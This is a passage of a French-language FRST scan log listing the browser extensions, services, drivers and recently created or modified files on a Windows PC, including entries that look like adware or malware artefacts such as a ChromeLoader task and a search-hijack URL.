hxxps://fr.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wnf_secureddownload_16_48_ssg02¶m1=1¶m2=f%3D1%26b%3Dchmm%26cc%3Dfr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzutDtDtBtCyD0CyDyD0BtDtD0FtC0B0CyEtN0D0Tzu0StCyBzyyEtN1L2XzutAtFtByDtFtCtFyDtBtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StD0B0D0BtByC0EzztGyDtD0CzytG0CzyzztCtGtD0D0AyCtG0B0A0DtBtByBtB0AtAtDtC0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2Szy0AyCzy0BtD0FyBtGtCtD0BtDtGyEtD0AyBtGzz0ByC0AtGtC0FtAtAzzyCtDtByBtA0AyB2QtN0A0LzuyE%26cr%3D1050113949%26a%3Dwnf_secureddownload_16_48_ssg02%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional CHR Extension: (Slides) - C:\Users\alexc\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-06-08] CHR Extension: (Save to Google Photos™) - C:\Users\alexc\AppData\Local\Google\Chrome\User Data\Default\Extensions\aoanickgmocpddnppajakfcafbkncdab [2020-05-31] CHR Extension: (Docs) - C:\Users\alexc\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-06-08] CHR Extension: (Google Drive) - C:\Users\alexc\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-10-24] CHR Extension: (YouTube) - C:\Users\alexc\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-06-08] CHR Extension: (Songive - lightweight YouTube playlist player) - C:\Users\alexc\AppData\Local\Google\Chrome\User Data\Default\Extensions\dpnpmgndpambijpadoflcjonkakfdnca [2019-09-02] CHR Extension: (wanteeed) - C:\Users\alexc\AppData\Local\Google\Chrome\User Data\Default\Extensions\emnoomldgleagdjapdeckpmebokijail [2021-10-20] CHR Extension: (Avast SafePrice | Comparaison, offres, coupons) - C:\Users\alexc\AppData\Local\Google\Chrome\User Data\Default\Extensions\eofcbnmajmjmplflapaojjnihcjkigck [2021-11-06] CHR Extension: (Sheets) - C:\Users\alexc\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-06-08] CHR Extension: (Google Docs hors connexion) - C:\Users\alexc\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-12-05] CHR Extension: (AdBlock — le meilleur bloqueur de pubs) - C:\Users\alexc\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2022-01-08] CHR Extension: (Substital: Ajoutez des sous-titres aux vidéos) - C:\Users\alexc\AppData\Local\Google\Chrome\User Data\Default\Extensions\kkkbiiikppgjdiebcabomlbidfodipjg [2021-12-07] CHR Extension: (Loom for Chrome) - C:\Users\alexc\AppData\Local\Google\Chrome\User Data\Default\Extensions\liecbddmkiiihnedobmlmillhodjkdmb [2021-12-18] CHR Extension: (Яндекс) - C:\Users\alexc\AppData\Local\Google\Chrome\User Data\Default\Extensions\mjmpfdkmpojoeemjmfiddlhkkndcdpno [2020-11-18] CHR Extension: (Screencastify - Screen Video Recorder) - C:\Users\alexc\AppData\Local\Google\Chrome\User Data\Default\Extensions\mmeijimgabbpbgpdklnllpncmdofkcpn [2021-12-22] CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\alexc\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29] CHR Extension: (Gmail) - C:\Users\alexc\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-23] CHR Extension: (Options) - C:\Users\alexc\AppData\Local [2022-01-12] CHR Profile: C:\Users\alexc\AppData\Local\Google\Chrome\User Data\System Profile [2021-02-27] CHR HKLM\...\Chrome\Extension: [bhoagceacaklimpcejjofabngcjkebfg] CHR HKLM\...\Chrome\Extension: [nccfgpamboionigdpfjmijhlgmgdbael] CHR HKU\S-1-5-21-1722835910-503718021-2123007925-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bhoagceacaklimpcejjofabngcjkebfg] CHR HKU\S-1-5-21-1722835910-503718021-2123007925-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mjmpfdkmpojoeemjmfiddlhkkndcdpno] CHR HKU\S-1-5-21-1722835910-503718021-2123007925-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nccfgpamboionigdpfjmijhlgmgdbael] CHR HKLM-x32\...\Chrome\Extension: [bhoagceacaklimpcejjofabngcjkebfg] CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] CHR HKLM-x32\...\Chrome\Extension: [nccfgpamboionigdpfjmijhlgmgdbael] CHR HKLM-x32\...\Chrome\Extension: [ohhcpmplhhiiaoiddkfboafbhiknefdf] Opera: ======= OPR Profile: C:\Users\alexc\AppData\Roaming\Opera Software\Opera Stable [2020-11-15] Yandex: ======= YAN Profile: C:\Users\alexc\AppData\Local\Yandex\YandexBrowser\User Data\Default [2020-11-15] YAN DefaultSearchURL: Default -> hxxps://browser-resources.s3.yandex.net/old/get/browser/launcher_images/windows/yandex/pochta_win.targetsize-256.png YAN Extension: (Я.Почта) - C:\Users\alexc\AppData\Local\Yandex\YandexBrowser\User Data\Default\Extensions\bcadigmkecmhhknameopgaidphameinh [2020-11-15] ==================== Services (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [169728 2021-11-17] (Adobe Inc. -> Adobe Inc.) R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [816184 2019-07-05] (Adobe Inc. -> Adobe Inc.) R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3849472 2021-11-23] (Adobe Inc. -> Adobe Systems, Incorporated) R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3617024 2021-11-23] (Adobe Inc. -> Adobe Systems, Incorporated) R2 Amsp; C:\Program Files\Trend Micro\AMSP\coreServiceShell.exe [384032 2019-07-29] (Trend Micro, Inc. -> Trend Micro Inc.) R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [99104 2021-03-16] (Apple Inc. -> Apple Inc.) S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8901968 2021-10-23] (BattlEye Innovations e.K. -> ) R2 CleanMyPCService; C:\Program Files\CleanMyPC\CleanMyPCService.exe [491688 2021-11-30] (MacPaw, Inc. -> MacPaw Inc.) R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [8689000 2021-12-13] (Microsoft Corporation -> Microsoft Corporation) R2 CyberGhost8Service; C:\Program Files\CyberGhost 8\Dashboard.Service.exe [67312 2021-11-25] (CyberGhost S.R.L. -> CyberGhost S.R.L.) R3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [5030080 2021-05-14] (AVB Disc Soft, SIA -> Disc Soft Ltd) S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [803440 2021-09-24] (EasyAntiCheat Oy -> EasyAntiCheat Ltd) S3 EasyAntiCheat_EOS; C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.exe [588264 2022-01-08] (EasyAntiCheat Oy -> Epic Games, Inc.) S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [439880 2021-01-05] (Epic Games Inc. -> Epic Games, Inc.) R2 Hamachi2Svc; C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe [3361736 2019-04-02] (LogMeIn, Inc. -> LogMeIn Inc.) S2 InnocentKalaga; C:\Program Files (x86)\InnocentKalaga\InnocentKalaga.exe [5948912 2018-04-05] (Apps Delivered Ltd -> Innocent Kalaga) [Fichier non signé] R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe [419248 2016-05-27] (LogMeIn, Inc. -> LogMeIn, Inc.) R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [7901368 2022-01-12] (Malwarebytes Inc -> Malwarebytes) R2 MEmuSVC; C:\Program Files\Microvirt\MEmu\MemuService.exe [85304 2019-09-12] (Shanghai Microvirt Software Technology Co., Ltd. -> ) S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2559704 2021-12-02] (Electronic Arts, Inc. -> Electronic Arts) R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3477728 2021-12-02] (Electronic Arts, Inc. -> Electronic Arts) S3 OverwolfUpdater; C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [2539864 2022-01-11] (Overwolf Ltd -> Overwolf LTD) R2 Platinum Host Service; C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtSvcHost.exe [1127584 2019-07-29] (Trend Micro, Inc. -> Trend Micro Inc.) S3 Rockstar Service; C:\Program Files\Rockstar Games\Launcher\RockstarService.exe [2020144 2021-09-18] (Rockstar Games, Inc. -> Rockstar Games) S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [6138112 2021-12-17] (Microsoft Windows Publisher -> Microsoft Corporation) S3 TmWscSvc; C:\Program Files\Trend Micro\Titanium\TmWscSvc\TmWscSvc.exe [406440 2019-11-05] (Trend Micro, Inc. -> Trend Micro Inc.) S3 vgc; C:\Program Files\Riot Vanguard\vgc.exe [10147296 2021-06-22] (Riot Games, Inc. -> Riot Games, Inc.) S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\NisSrv.exe [2876152 2021-12-16] (Microsoft Windows Publisher -> Microsoft Corporation) S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MsMpEng.exe [128360 2021-12-16] (Microsoft Windows Publisher -> Microsoft Corporation) R2 NVDisplay.ContainerLocalSystem; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_3784df9edffd3314\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_3784df9edffd3314\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem ===================== Pilotes (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) R3 AMDXE; C:\WINDOWS\System32\drivers\amdxe.sys [62056 2020-07-27] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) R3 AppleKmdfFilter; C:\WINDOWS\System32\drivers\AppleKmdfFilter.sys [20032 2020-10-09] (WDKTestCert build,132303256403278908 -> Apple Inc.) R3 AppleLowerFilter; C:\WINDOWS\System32\drivers\AppleLowerFilter.sys [35976 2020-10-09] (WDKTestCert build,132303256403278908 -> Apple Inc.) S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [Fichier non signé] S3 BthHFEnum; C:\WINDOWS\System32\drivers\bthhfenum.sys [144896 2019-12-07] (Microsoft Corporation) [Fichier non signé] S3 CH341SER_A64; C:\WINDOWS\System32\Drivers\CH341S64.SYS [59904 2015-01-25] (Microsoft Windows Hardware Compatibility Publisher -> www.winchiphead.com) R3 CMUSBDAC; C:\WINDOWS\system32\DRIVERS\CMUSBDAC.sys [3819744 2018-07-24] (WDKTestCert cm359,131641702659254692 -> C-MEDIA) R3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [42256 2020-06-02] (AVB Disc Soft, SIA -> Disc Soft Ltd) R3 dtliteusbbus; C:\WINDOWS\System32\drivers\dtliteusbbus.sys [59360 2020-06-02] (AVB Disc Soft, SIA -> Disc Soft Ltd) R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [160176 2022-01-12] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes) S3 Hamachi; C:\WINDOWS\System32\drivers\Hamdrv.sys [45680 2019-04-02] (Microsoft Windows Hardware Compatibility Publisher -> LogMeIn Inc.) R2 MBAMChameleon; C:\WINDOWS\System32\Drivers\MbamChameleon.sys [210352 2022-01-12] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes) S0 MbamElam; C:\WINDOWS\System32\DRIVERS\MbamElam.sys [19912 2022-01-12] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes) R3 MBAMFarflt; C:\WINDOWS\System32\DRIVERS\farflt.sys [193448 2022-01-12] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes) R3 MBAMProtection; C:\WINDOWS\system32\DRIVERS\mbam.sys [69040 2022-01-12] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes) R3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [248992 2022-01-12] (Malwarebytes Inc -> Malwarebytes) R3 MBAMWebProtection; C:\WINDOWS\system32\DRIVERS\mwac.sys [149424 2022-01-12] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes) S3 megasas2; C:\WINDOWS\System32\drivers\megasas2.sys [83512 2018-10-30] (Avago Technologies U.S. Inc. -> Avago Technologies) S3 megasas35; C:\WINDOWS\System32\drivers\megasas35.sys [88608 2018-08-24] (Avago Technologies U.S. Inc. -> Avago Technologies) R1 MEmuDrv; C:\WINDOWS\system32\DRIVERS\MEmuDrv.sys [320360 2021-01-04] (Shanghai Microvirt Software Technology Co., Ltd. -> Maiwei Corporation) S3 Netaapl; C:\WINDOWS\System32\drivers\netaapl64.sys [32352 2017-11-28] (Microsoft Windows Hardware Compatibility Publisher -> Apple Inc.) R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [48552 2021-11-01] (Microsoft Windows Hardware Compatibility Publisher -> NVIDIA Corporation) R3 RtlWlanu; C:\WINDOWS\System32\drivers\wna3100m.sys [1576080 2012-10-04] (Realtek Semiconductor Corp -> Realtek Semiconductor Corporation) S3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [42856 2016-03-27] (Open Source Developer, Benjamin Höglinger-Stelzer -> Nefarius Software Solutions) S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.) S3 ssudqcfilter; C:\WINDOWS\System32\drivers\ssudqcfilter.sys [64912 2017-05-18] (Samsung Electronics Co., Ltd. -> QUALCOMM Incorporated) R3 tap0901; C:\WINDOWS\System32\drivers\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project) R0 TMEBC; C:\WINDOWS\System32\DRIVERS\TMEBC64.sys [74760 2019-06-04] (Trend Micro, Inc. -> Trend Micro Inc.) R2 tmeevw; C:\WINDOWS\system32\DRIVERS\tmeevw.sys [147672 2017-05-10] (Trend Micro, Inc. -> Trend Micro Inc.) S0 tmel; C:\WINDOWS\System32\DRIVERS\tmel.sys [37552 2019-06-04] (Microsoft Windows Early Launch Anti-malware Publisher -> Trend Micro Inc.) R1 tmeyes; C:\WINDOWS\system32\DRIVERS\tmeyes.sys [679712 2019-07-12] (Trend Micro, Inc. -> Trend Micro Inc.) R2 tmnciesc; C:\WINDOWS\system32\DRIVERS\tmnciesc.sys [562296 2018-03-07] (Trend Micro, Inc. -> Trend Micro Inc.) S1 tmumh; C:\WINDOWS\system32\DRIVERS\TMUMH.sys [157448 2019-09-23] (Trend Micro, Inc. -> Trend Micro Inc.) R2 tmusa; C:\WINDOWS\system32\DRIVERS\tmusa.sys [137776 2019-05-04] (Trend Micro, Inc. -> Trend Micro Inc.) S3 usbser; C:\Windows\SysWOW64\drivers\usbser.sys [25600 2008-12-02] (Microsoft Corporation) [Fichier non signé] R1 vgk; C:\Program Files\Riot Vanguard\vgk.sys [8241992 2021-06-22] (Riot Games, Inc. -> Riot Games, Inc.) R1 ViGEmBus; C:\WINDOWS\System32\drivers\ViGEmBus.sys [165744 2020-12-14] (Microsoft Windows Hardware Compatibility Publisher -> Nefarius Software Solutions e.U.) S3 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2021-12-16] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation) S3 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [435432 2021-12-16] (Microsoft Windows -> Microsoft Corporation) S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [86248 2021-12-16] (Microsoft Windows -> Microsoft Corporation) R1 YSDrv; C:\Program Files (x86)\Bignox\BigNoxVM\RT\YSDrv.sys [312776 2021-12-07] (Microsoft Windows Hardware Compatibility Publisher -> Nox Limited Corporation) ==================== NetSvcs (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) ==================== Un mois (créés) (Avec liste blanche) ========= (Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.) 2022-01-12 20:39 - 2022-01-12 20:41 - 000115929 _____ C:\Users\alexc\Downloads\Addition.txt 2022-01-12 20:37 - 2022-01-12 20:41 - 000041535 _____ C:\Users\alexc\Downloads\FRST.txt 2022-01-12 20:37 - 2022-01-12 20:41 - 000000000 ____D C:\FRST 2022-01-12 20:36 - 2022-01-12 20:36 - 002311680 _____ (Farbar) C:\Users\alexc\Downloads\FRST64.exe 2022-01-12 20:34 - 2022-01-12 20:34 - 000193448 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys 2022-01-12 20:34 - 2022-01-12 20:34 - 000149424 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys 2022-01-12 20:34 - 2022-01-12 20:34 - 000069040 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys 2022-01-12 20:34 - 2022-01-12 20:34 - 000000000 ____D C:\Users\alexc\AppData\LocalLow\IGDump 2022-01-12 20:30 - 2022-01-12 20:30 - 000548774 _____ C:\Users\alexc\Downloads\winupdatefix_1.3 (1).exe 2022-01-12 20:26 - 2022-01-12 20:26 - 000248992 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys 2022-01-12 20:26 - 2022-01-12 20:26 - 000210352 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamChameleon.sys 2022-01-12 20:26 - 2022-01-12 20:26 - 000160176 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae64.sys 2022-01-12 20:26 - 2022-01-12 20:26 - 000002040 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes.lnk 2022-01-12 20:26 - 2022-01-12 20:26 - 000002028 _____ C:\Users\Public\Desktop\Malwarebytes.lnk 2022-01-12 20:26 - 2022-01-12 20:26 - 000000000 ____D C:\Users\alexc\AppData\Local\mbam 2022-01-12 20:26 - 2022-01-12 20:25 - 000019912 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamElam.sys 2022-01-12 20:25 - 2022-01-12 20:25 - 002910904 _____ (Malwarebytes) C:\Users\alexc\Downloads\MBSetup.exe 2022-01-12 20:25 - 2022-01-12 20:25 - 000000000 ____D C:\ProgramData\Malwarebytes 2022-01-12 20:25 - 2022-01-12 20:25 - 000000000 ____D C:\Program Files\Malwarebytes 2022-01-12 18:15 - 2022-01-12 18:15 - 000000000 ___HD C:\$SysReset 2022-01-12 18:10 - 2022-01-12 18:10 - 000003512 _____ C:\WINDOWS\system32\Tasks\CleanMyPCSkipUAC 2022-01-12 18:10 - 2022-01-12 18:10 - 000000872 _____ C:\Users\Public\Desktop\CleanMyPC.lnk 2022-01-12 18:10 - 2022-01-12 18:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CleanMyPC 2022-01-12 18:10 - 2022-01-12 18:10 - 000000000 ____D C:\ProgramData\MacPaw Inc 2022-01-12 18:10 - 2022-01-12 18:10 - 000000000 ____D C:\Program Files\CleanMyPC 2022-01-12 18:09 - 2022-01-12 18:10 - 028961016 _____ (MacPaw, Inc. ) C:\Users\alexc\Downloads\CleanMyPC.exe 2022-01-12 12:36 - 2022-01-12 20:33 - 101187584 _____ C:\WINDOWS\system32\config\SOFTWARE 2022-01-12 12:33 - 2022-01-12 12:36 - 000000000 ____D C:\WINDOWS\Microsoft Antimalware 2022-01-12 11:36 - 2022-01-12 11:36 - 000000000 ___HD C:\$WinREAgent 2022-01-11 20:26 - 2022-01-11 20:26 - 000548774 _____ C:\Users\alexc\Downloads\winupdatefix_1.3.exe 2022-01-11 17:56 - 2022-01-11 17:56 - 000000222 _____ C:\Users\alexc\Desktop\F1 2019.url 2022-01-08 22:55 - 2022-01-08 22:55 - 000000000 ____D C:\Users\alexc\Documents\CacheDir 2022-01-08 22:54 - 2022-01-08 22:54 - 000000000 ____D C:\Program Files (x86)\EasyAntiCheat_EOS 2022-01-08 22:45 - 2022-01-08 22:45 - 000000223 _____ C:\Users\alexc\Desktop\Propnight.url 2022-01-08 22:23 - 2022-01-12 12:23 - 000000000 ____D C:\Users\alexc\AppData\Local\chrome 2022-01-08 22:22 - 2022-01-08 22:22 - 000012830 _____ C:\WINDOWS\system32\Tasks\ChromeLoader 2022-01-08 18:19 - 2022-01-08 18:19 - 000000000 ____D C:\WINDOWS\Panther 2022-01-08 17:50 - 2022-01-08 17:51 - 000002262 _____ C:\WINDOWS\system32\Drivers\etc\hosts.rollback 2022-01-08 17:50 - 2020-04-19 10:33 - 000001257 _____ C:\WINDOWS\system32\Drivers\etc\hosts.backup 2022-01-08 15:58 - 2022-01-08 15:58 - 000108784 _____ C:\Users\alexc\AppData\Roaming\whw.exe 2022-01-08 15:58 - 2022-01-08 15:58 - 000012288 _____ C:\Users\alexc\AppData\Roaming\e3dwefw.exe 2022-01-02 12:35 - 2022-01-02 12:35 - 000000000 ____D C:\Users\Public\Documents\OnlineFix 2022-01-02 12:35 - 2022-01-02 12:35 - 000000000 ____D C:\Users\alexc\AppData\Local\Propnight 2022-01-02 12:35 - 2022-01-02 12:35 - 000000000 ____D C:\Program Files\Bonjour 2022-01-02 12:35 - 2022-01-02 12:35 - 000000000 ____D C:\Program Files (x86)\Bonjour 2022-01-02 12:34 - 2022-01-02 12:34 - 000000000 ____D C:\Program Files\Common Files\Apple 2022-01-02 12:32 - 2022-01-02 12:36 - 000000000 ____D C:\3uTools 2021-12-26 13:06 - 2021-12-26 13:06 - 000003012 _____ C:\Users\alexc\Desktop\YouTube.lnk 2021-12-21 19:39 - 2021-12-21 19:39 - 000000000 ____D C:\Users\alexc\Documents\WB Games 2021-12-21 19:38 - 2021-12-21 19:38 - 000000000 ____D C:\Users\alexc\Documents\CPY_SAVES 2021-12-18 21:44 - 2021-12-18 21:44 - 000000000 ____D C:\Users\alexc\AppData\LocalLow\Redbeet Interactive 2021-12-17 18:48 - 2021-12-17 18:48 - 000000000 ____D C:\WINDOWS\SystemTemp 2021-12-17 15:14 - 2021-12-17 15:14 - 000272384 _____ C:\WINDOWS\system32\TpmTool.exe 2021-12-17 15:14 - 2021-12-17 15:14 - 000223744 _____ C:\WINDOWS\SysWOW64\TpmTool.exe 2021-12-17 15:14 - 2021-12-17 15:14 - 000162816 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe 2021-12-17 15:14 - 2021-12-17 15:14 - 000011979 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim 2021-12-15 18:47 - 2021-12-17 17:07 - 000000363 _____ C:\Users\alexc\Desktop\Fortnite.url ==================== Un mois (modifiés) ================== (Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.) 2022-01-12 20:40 - 2021-03-20 13:31 - 001770910 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2022-01-12 20:40 - 2019-12-07 15:50 - 000791762 _____ C:\WINDOWS\system32\perfh00C.dat 2022-01-12 20:40 - 2019-12-07 15:50 - 000149928 _____ C:\WINDOWS\system32\perfc00C.dat 2022-01-12 20:40 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF 2022-01-12 20:37 - 2020-05-09 17:28 - 000000001 _____ C:\WINDOWS\vgkbootstatus.dat 2022-01-12 20:37 - 2019-06-08 20:05 - 000000000 ____D C:\Program Files (x86)\Google 2022-01-12 20:36 - 2021-09-15 10:59 - 000000000 ____D C:\Program Files\CCleaner 2022-01-12 20:36 - 2019-06-09 17:24 - 000000000 ____D C:\Users\alexc\AppData\Local\LogMeIn Hamachi 2022-01-12 20:35 - 2021-05-19 13:41 - 000000000 ____D C:\Users\alexc\AppData\Local\CyberGhost 2022-01-12 20:34 - 2021-03-20 13:32 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT 2022-01-12 20:34 - 2021-03-20 13:20 - 000008192 ___SH C:\DumpStack.log.tmp 2022-01-12 20:34 - 2021-01-09 10:45 - 000000000 ____D C:\ProgramData\NVIDIA 2022-01-12 20:34 - 2019-12-20 17:06 - 000000000 ____D C:\Users\alexc\AppData\Roaming\WTablet 2022-01-12 20:34 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ServiceState 2022-01-12 20:34 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2022-01-12 20:33 - 2019-12-07 10:03 - 000786432 _____ C:\WINDOWS\system32\config\BBI 2022-01-12 20:33 - 2019-06-22 17:57 - 000000000 ____D C:\Program Files (x86)\Steam 2022-01-12 20:33 - 2019-06-20 16:57 - 000000000 ____D C:\Users\alexc\AppData\Roaming\Discord 2022-01-12 20:26 - 2019-12-07 10:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP 2022-01-12 19:49 - 2020-06-19 16:15 - 000000000 ____D C:\Users\alexc\AppData\Local\Discord 2022-01-12 18:11 - 2021-11-29 19:07 - 000000000 ____D C:\Users\alexc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line 2022-01-12 18:11 - 2021-05-14 12:36 - 000000000 ____D C:\Program Files\7-Zip 2022-01-12 14:51 - 2021-08-23 10:50 - 000000000 ____D C:\Program Files (x86)\Overwolf 2022-01-12 13:34 - 2019-08-19 10:20 - 000000000 ____D C:\Users\alexc\AppData\Local\CrashDumps 2022-01-12 12:56 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp 2022-01-12 11:35 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps 2022-01-12 11:35 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness 2022-01-11 20:48 - 2019-10-03 18:08 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData 2022-01-11 20:30 - 2019-12-20 21:36 - 000000000 ____D C:\Users\alexc\AppData\Local\Adobe 2022-01-11 20:16 - 2019-06-07 22:01 - 000000000 ____D C:\Users\alexc\AppData\Local\D3DSCache 2022-01-11 17:56 - 2019-01-15 18:52 - 000000000 ____D C:\Users\alexc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam 2022-01-11 17:16 - 2021-03-20 13:32 - 000004562 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task 2022-01-11 17:16 - 2020-05-23 10:47 - 000002143 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk 2022-01-11 17:13 - 2021-09-15 10:59 - 000004210 _____ C:\WINDOWS\system32\Tasks\CCleaner Update 2022-01-08 22:54 - 2019-09-14 22:36 - 000000000 ____D C:\Users\alexc\AppData\Roaming\EasyAntiCheat 2022-01-08 18:18 - 2020-05-04 12:28 - 000000000 ____D C:\Users\alexc\AppData\Local\BitTorrentHelper 2022-01-08 17:57 - 2020-03-19 11:22 - 000000000 ____D C:\Users\alexc\AppData\Roaming\vlc 2022-01-08 17:50 - 2021-05-14 19:55 - 000000000 ____D C:\Games 2022-01-08 16:24 - 2021-02-22 12:18 - 000000000 ____D C:\STG Games 2022-01-08 16:00 - 2021-09-17 17:37 - 000000000 ____D C:\Users\alexc\Documents\MEGAsync Downloads 2022-01-08 15:56 - 2020-11-15 19:23 - 000000000 ____D C:\Users\alexc\AppData\Local\Yandex 2022-01-08 15:23 - 2020-08-24 12:59 - 000002449 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk 2021-12-29 17:49 - 2019-06-11 10:38 - 000000000 ____D C:\Program Files (x86)\Microsoft Office 2021-12-26 13:06 - 2018-12-22 15:42 - 000000000 ____D C:\Users\alexc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Applications Chrome 2021-12-23 12:14 - 2021-03-20 13:22 - 000000000 ____D C:\WINDOWS\system32\SleepStudy 2021-12-21 19:08 - 2019-07-02 12:13 - 000000000 ____D 